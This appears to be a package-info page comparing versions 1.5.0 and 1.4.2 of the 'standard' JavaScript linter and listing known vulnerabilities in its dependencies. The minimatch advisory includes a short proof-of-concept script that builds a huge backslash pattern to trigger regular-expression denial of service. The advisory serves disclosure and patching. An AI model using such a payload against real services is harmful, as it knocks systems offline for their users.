Standard version 1.5.0 introduces notable changes compared to its predecessor, version 1.4.2, primarily centered around its development dependencies. While both versions share the same core dependencies essential for enforcing the JavaScript Standard Style, such as glob, jscs, split, jshint, find-root, and minimatch, version 1.5.0 incorporates additional tools specifically for development and testing. The most significant difference lies in the addition of mkdirp, rimraf, and run-series as development dependencies.
These additions indicate an enhanced development workflow, likely focusing on improved build processes, easier directory creation (mkdirp), cross-platform file deletion (rimraf), and streamlined sequential task execution (run-series). For developers utilizing standard, this translates to potentially faster and more reliable testing and build procedures within the standard package itself. The core functionality of enforcing JavaScript Standard Style remains consistent, but the updated development dependencies point toward a more robust and maintainable codebase, indirectly benefiting end-users through a more stable and refined tool. Importantly, the core linting behavior should remain the same between the two versions, since both the core dependencies and the primary functionality are untouched.
All vulnerabilities related to version 1.5.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// a pattern with a very long run of escapes inside a character class
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.